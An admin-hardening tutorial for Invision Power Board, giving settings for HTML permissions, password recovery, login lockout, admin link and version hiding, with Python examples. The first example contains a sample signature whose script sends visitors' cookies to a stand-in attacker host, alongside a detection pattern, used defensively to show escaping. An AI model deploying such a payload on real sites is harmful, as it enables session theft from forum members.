IPB Tutorial: Security Tips
In this section of the tutorial you will find several tips on how to improve the security of your Invision Power Board.
1. Do not allow HTML for your board except for user groups that you can fully trust. A member who is allowed to post raw HTML can embed script that runs in the browser of every visitor who views the post, signature or message, so the setting should stay off for the general membership. When creating a forum you can choose not to allow HTML code in the various sections of the board. You can disallow HTML code in all of the areas listed below:
To disable HTML in signatures and the About Me section for members go to System tab -> System Settings -> Members tab -> User Profiles.
To disable HTML in personal messages between users go to System tab -> System Settings -> Members tab -> Personal Message Set-up.
To disable HTML in posts for specific user groups go to Members tab -> Manage User Groups -> Edit for the group -> Global tab.
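As an added illustration (example code written for this tutorial, not code from IP.Board itself), the following Python model renders the same member signature once with HTML allowed and once with it disallowed, and flags the rendering that would execute script. The signature text, the member names and the helper functions are constructed for the example; IP.Board's own renderer is not modelled here.

```python
import html
import re

# Constructed sample: a signature a malicious member might save when HTML is allowed.
MALICIOUS_SIGNATURE = (
    'Regards, Bob<script>new Image().src='
    '"http://attacker.example/steal?c=" + document.cookie</script>'
)

# Patterns for the most common ways script is smuggled into user content.
ACTIVE_CONTENT = re.compile(
    r"<\s*script|<\s*iframe|\bon[a-z]+\s*=|javascript:",
    re.IGNORECASE,
)


def render_user_content(text: str, group_allows_html: bool) -> str:
    """Hypothetical model of how a board emits member-supplied text.

    With HTML disallowed the text is escaped, so the browser shows the
    characters literally.  With HTML allowed it is emitted verbatim, and any
    script inside it runs in the browser of every member who views the page,
    with that member's session cookie available to it.
    """
    if group_allows_html:
        return text
    return html.escape(text, quote=True)


def contains_active_content(rendered: str) -> bool:
    """True if the rendered output still contains a live tag or event handler."""
    return ACTIVE_CONTENT.search(rendered) is not None


def audit_signatures(signatures: dict[str, tuple[str, bool]]) -> list[str]:
    """Return the members whose rendered signature would execute script.

    signatures maps member name -> (signature text, member's group allows HTML).
    """
    return [
        member
        for member, (text, allows_html) in signatures.items()
        if contains_active_content(render_user_content(text, allows_html))
    ]


if __name__ == "__main__":
    sample = {
        "bob": (MALICIOUS_SIGNATURE, True),     # trusted group with HTML on
        "alice": (MALICIOUS_SIGNATURE, False),  # HTML off: payload is escaped
        "carol": ("Plain text only", True),
    }
    print(audit_signatures(sample))  # -> ['bob']
```

The point the audit makes is that trust is granted per group, but the payload runs in every reader's browser regardless of who posted it; a single trusted member whose account is compromised is enough.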
2. For lost password recovery it is best to use the email random password option.
This option can be altered via the IPBoard admincp -> System -> System Settings -> System Tab -> Security and Privacy.
Note that it is highly advisable to email a newly generated password instead of letting the user enter one manually: anyone who knows a username can submit the lost password form, but only someone who also controls that member's email address can read the new password, and it is much less likely that the email account is compromised as well.
3. Set a limit on the number of failed login attempts. Once the limit is reached the account is locked out of the forum for a set time.
This option can be altered via the IPBoard admincp -> System -> System Settings -> System Tab -> Security and Privacy -> Brute-force Account Locking section.
The other two options in that section allow you to define whether blocked accounts are automatically unlocked and, if so, after how many minutes. Bear in mind that account locking can also be turned against you: anyone who knows a username can deliberately trigger the lock, so automatic unlocking after a short period is usually preferable to requiring an administrator to unlock accounts by hand.
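To make the behaviour of these three settings concrete, here is an added Python model of per-account brute-force locking (example code written for this tutorial, not IP.Board's own implementation). The attempt limit and unlock period are assumed values; the clock is injectable so the lock expiry can be exercised without waiting.

```python
import time
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

# Assumed values: set them to match your Brute-force Account Locking settings.
MAX_FAILED_ATTEMPTS = 5
AUTO_UNLOCK_MINUTES = 15


@dataclass
class AccountState:
    failures: int = 0                  # consecutive failures since the last success or unlock
    locked_at: Optional[float] = None  # epoch seconds when the lock began, or None


class LoginGuard:
    """Hypothetical model of per-account brute-force locking.

    Reproduces only the behaviour the settings describe so the edge cases
    can be seen; it is not IP.Board's code.
    """

    def __init__(
        self,
        max_attempts: int = MAX_FAILED_ATTEMPTS,
        auto_unlock_minutes: Optional[int] = AUTO_UNLOCK_MINUTES,
        clock: Callable[[], float] = time.time,
    ) -> None:
        self.max_attempts = max_attempts
        # None means "never unlock automatically": an administrator must do it.
        self.auto_unlock_seconds = (
            None if auto_unlock_minutes is None else auto_unlock_minutes * 60
        )
        self.clock = clock
        self.accounts: Dict[str, AccountState] = {}

    def _state(self, username: str) -> AccountState:
        return self.accounts.setdefault(username, AccountState())

    def is_locked(self, username: str) -> bool:
        state = self._state(username)
        if state.locked_at is None:
            return False
        if (
            self.auto_unlock_seconds is not None
            and self.clock() - state.locked_at >= self.auto_unlock_seconds
        ):
            # Lock period has elapsed: clear the lock and the failure counter.
            self.unlock(username)
            return False
        return True

    def unlock(self, username: str) -> None:
        """Manual administrator unlock (also used when a lock expires)."""
        self.accounts[username] = AccountState()

    def attempt(self, username: str, password_correct: bool) -> str:
        """Process one login attempt; returns 'ok', 'denied' or 'locked'.

        A locked account rejects even the correct password, otherwise an
        attacker could keep guessing and simply wait for the one that works.
        """
        if self.is_locked(username):
            return "locked"
        state = self._state(username)
        if password_correct:
            state.failures = 0
            return "ok"
        state.failures += 1
        if state.failures >= self.max_attempts:
            state.locked_at = self.clock()
            return "locked"
        return "denied"


def simulate() -> List[str]:
    """Walk through a brute-force attempt against a fake clock."""
    now = [1_000_000.0]
    guard = LoginGuard(clock=lambda: now[0])
    results = [guard.attempt("alice", False) for _ in range(MAX_FAILED_ATTEMPTS)]
    results.append(guard.attempt("alice", True))  # correct password, but locked
    now[0] += AUTO_UNLOCK_MINUTES * 60             # lock period elapses
    results.append(guard.attempt("alice", True))  # now accepted
    return results


if __name__ == "__main__":
    print(simulate())
```

The simulation returns four "denied" results, "locked" on the fifth failure, "locked" again for the correct password submitted during the lock period, and "ok" once the unlock time has passed. With automatic unlocking disabled the account stays locked until unlock() is called, which is the administrator workload the page warns about.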
4. Use the secure mail form for member to member communication. This way the email addresses of your board users are never shown to other members and cannot be harvested for spam and other fraudulent activities.
You can enable the secure mail form via IPBoard admincp -> System -> System Settings -> System Tab -> Security and Privacy -> Use secure mail form for member to member mails.
5. Remove the admincp link from your board and rename the administrator directory.
The link to the admin panel that is included on your forum index by default can be removed. This is highly advisable, together with renaming the admincp folder to something else, so that the admin login page is not advertised to every visitor or found by automated scanners that probe the default location. Keep in mind that this only hides the login page; it does not replace a strong, unique administrator password. The option can be altered via IPBoard admincp -> System -> System Settings -> System Tab -> Security and Privacy -> Remove the ACP link from the board.
6. It is highly advisable to manually approve new account registrations as well as to keep the option to verify registrations via email.
This option might not be suitable for very popular forums that receive many new user registrations every day. However, for closed communities it is best to have all new user registrations manually approved by forum administrators. This way spam bots and unauthorized users cannot post on your forum until an administrator has reviewed and approved them.
The strictest setting is to require users to first verify the new account via the email address they provided when registering. Once the registration is verified via email it is queued for approval by the board administrator. This option can be chosen via IPBoard admincp -> System -> System Settings -> System Tab -> Security and Privacy -> New registration email validation.
You might also want to take some time to adjust the remaining options in that section to suit your board.
7. Force users to log in before the board can be viewed. This way only registered users can view and post on your board. Note that in this case guests won't be able to view any of the forums. The option is available at IPBoard admincp -> System -> System Settings -> System Tab -> Security and Privacy -> Force guests to log in before allowing access to the board.
The alternative is to set specific permissions for each forum and thus allow some general purpose forums to be viewable by guests. For example you might want to make the news and forum rules viewable for everyone so they can read them before registering.
To achieve this, use the permissions matrix when creating a new forum or category. Do not grant any permissions to the group that guest users are automatically assigned to. This way none of your forums will be accessible to users that are not registered and logged in, except for the forums you explicitly add guest permissions to. In such cases it is highly advisable to grant only the Show Forum and Read Topics permissions, so guests can read but never start topics or reply.
8. Do not display the version of IPB you are running. Otherwise anyone trying to compromise your board can search for published exploits for that exact version instead of having to guess what is installed. Hiding the version only makes reconnaissance harder; it does not replace keeping the board updated.
Displaying the IPBoard version can be turned off via IPBoard admincp -> System -> System Settings -> System Tab -> Security and Privacy -> Privacy section -> Display IPB version on your site.
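To check that tips 5 and 8 have actually taken effect, here is an added Python scanner (example code written for this tutorial, not an IP.Board tool) that looks through a page's HTML for a version string, a generator meta tag and any link into the admin directory. The sample page is constructed for the example, the footer wording and meta tag it matches are assumptions about what a board might emit, and "admin" is the assumed default directory name; adjust the patterns to what your own board's page source contains.

```python
import re
import urllib.request
from typing import List

# Constructed sample of a board index page; not fetched from any real site.
SAMPLE_PAGE = """<html><head>
<meta name="generator" content="Invision Power Board">
</head><body>
<div id="footer">
  Powered by IP.Board 3.4.5
  <a href="/forums/admin/index.php">Admin CP</a>
</div>
</body></html>"""

# Assumed footer wording for the version display option; adjust to your board.
VERSION_PATTERNS = [
    re.compile(r"IP\.Board\s+v?\d+\.\d+(?:\.\d+)?", re.IGNORECASE),
    re.compile(r"Invision Power Board\s+v?\d+\.\d+(?:\.\d+)?", re.IGNORECASE),
]
GENERATOR_META = re.compile(
    r'<meta\s+name="generator"\s+content="([^"]*)"', re.IGNORECASE
)


def find_disclosures(page_html: str, admin_dir: str = "admin") -> List[str]:
    """Report version strings, generator tags and links into the admin directory.

    admin_dir is the directory the admin panel lives in ("admin" is the assumed
    default); pass the renamed directory to confirm no link still points at it.
    """
    findings: List[str] = []
    for pattern in VERSION_PATTERNS:
        for match in pattern.finditer(page_html):
            findings.append(f"version string: {match.group(0)}")
    for match in GENERATOR_META.finditer(page_html):
        findings.append(f"generator meta tag: {match.group(1)}")
    admin_link = re.compile(
        r'href="([^"]*/' + re.escape(admin_dir) + r'/[^"]*)"', re.IGNORECASE
    )
    for match in admin_link.finditer(page_html):
        findings.append(f"admin link: {match.group(1)}")
    return findings


def audit_url(url: str, admin_dir: str = "admin") -> List[str]:
    """Fetch your own board's index page and run the same checks (live use only)."""
    with urllib.request.urlopen(url, timeout=10) as response:
        body = response.read().decode("utf-8", "replace")
    return find_disclosures(body, admin_dir)


if __name__ == "__main__":
    for finding in find_disclosures(SAMPLE_PAGE):
        print(finding)
```

Run audit_url() only against a board you administer, after saving the settings, and expect an empty list; any finding that remains points at a template or skin that still emits the string.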
There are various other options you can manage for your IPBoard. Most of the other features that could be a security issue are already set to the most secure value by default. Bear in mind that you should carefully read and understand what each option does before changing it, in order to avoid any issues with your online board.